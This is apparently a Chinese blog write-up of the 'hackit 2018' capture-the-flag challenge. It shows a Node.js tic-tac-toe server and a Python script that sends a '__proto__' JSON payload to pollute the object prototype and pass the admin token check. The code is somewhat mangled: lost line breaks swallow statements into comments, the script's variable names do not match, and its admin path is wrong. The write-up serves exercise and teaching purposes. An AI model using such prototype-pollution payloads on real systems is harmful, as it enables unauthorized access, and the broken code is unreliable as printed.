当前位置: 首页 > news >正文

hackit 2018

news 2025/11/24 11:11:55

源代码

const express = require('express')
var hbs = require('hbs');
var bodyParser = require('body-parser');
const md5 = require('md5');
var morganBody = require('morgan-body');
const app = express();
var user = []; //empty for nowvar matrix = [];
for (var i = 0; i < 3; i++){matrix[i] = [null , null, null];
}function draw(mat) {var count = 0;for (var i = 0; i < 3; i++){for (var j = 0; j < 3; j++){if (matrix[i][j] !== null){count += 1;}}}return count === 9;
}app.use(express.static('public'));
app.use(bodyParser.json());
app.set('view engine', 'html');
morganBody(app);
app.engine('html', require('hbs').__express);app.get('/', (req, res) => {for (var i = 0; i < 3; i++){matrix[i] = [null , null, null];}res.render('index');
})app.get('/admin', (req, res) => { /*this is under development I guess ??*/console.log(user.admintoken);if(user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken){res.send('Hey admin your flag is <b>flag{prototype_pollution_is_very_dangerous}</b>');} else {res.status(403).send('Forbidden');}    
}
)app.post('/api', (req, res) => {var client = req.body;var winner = null;if (client.row > 3 || client.col > 3){client.row %= 3;client.col %= 3;}matrix[client.row][client.col] = client.data;for(var i = 0; i < 3; i++){if (matrix[i][0] === matrix[i][1] && matrix[i][1] === matrix[i][2] ){if (matrix[i][0] === 'X') {winner = 1;}else if(matrix[i][0] === 'O') {winner = 2;}}if (matrix[0][i] === matrix[1][i] && matrix[1][i] === matrix[2][i]){if (matrix[0][i] === 'X') {winner = 1;}else if(matrix[0][i] === 'O') {winner = 2;}}}if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'X'){winner = 1;}if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'O'){winner = 2;} if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'X'){winner = 1;}if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'O'){winner = 2;}if (draw(matrix) && winner === null){res.send(JSON.stringify({winner: 0}))}else if (winner !== null) {res.send(JSON.stringify({winner: winner}))}else {res.send(JSON.stringify({winner: -1}))}})
app.listen(3000, () => {console.log('app listening on port 3000!')
})

获取flag的条件是 传入的querytoken要和user数组本身的admintoken的MD5值相等,且二者都要存在。

在pycharm下发送post请求测试 

from wsgiref import headersimport requests
import jsonurl = "http://192.168.17.1:3000/api"url1 = "http://192.168.17.1:3000/api/admin?querytoken=5881ca97cfe9782358a88e0b31092814"heads = {"Content-type": "application/json"}data = {"row": "__proto__", "col": "admintoken", "data": "oupeng"}res1 = requests.post(url, headers=headers, data=json.dumps(data))res2 = requests.get(url1)print(res2.text)

结果


http://www.mrgr.cn/news/8024.html

相关文章:

  • QT上位机学习路线(C++)
  • PHP反序列化二
  • ArcGIS Pro基础:如何将数据和引用地图样式一起打包分享
  • Golang | Leetcode Golang题解之第367题有效的完全平方数
  • rust api接口开发(以登陆和中间件鉴权为例)
  • MidJourney付费失败的原因以及失败后如何取消或续订(文末附MidJourney,GPT-4o教程)
  • 如何在Spring Boot应用中加载和使用TensorFlow模型
  • HTML5 浏览器支持
  • 如何使用ssm实现基于JAVA的网上药品售卖系统
  • java通过JDBC连接mysql和postgres数据库实现读写数据
  • 利用API返回值实现商品信息的自动化更新
  • git提交项目,报403无权限
  • 福特汽车削减电动车计划,聚焦成本控制
  • 支持2.4G频秒变符合GB42590的标准的飞行器【无人机GB42590发射端】
  • Springboot统一给redis缓存的Key加前缀
  • 【网络】传输层协议——TCP协议(初阶)
  • Java JNA调用C函数常见问题及解决方法
  • Elasticsearch核心
  • 开发者学习类网站
  • 第二课《动态规划》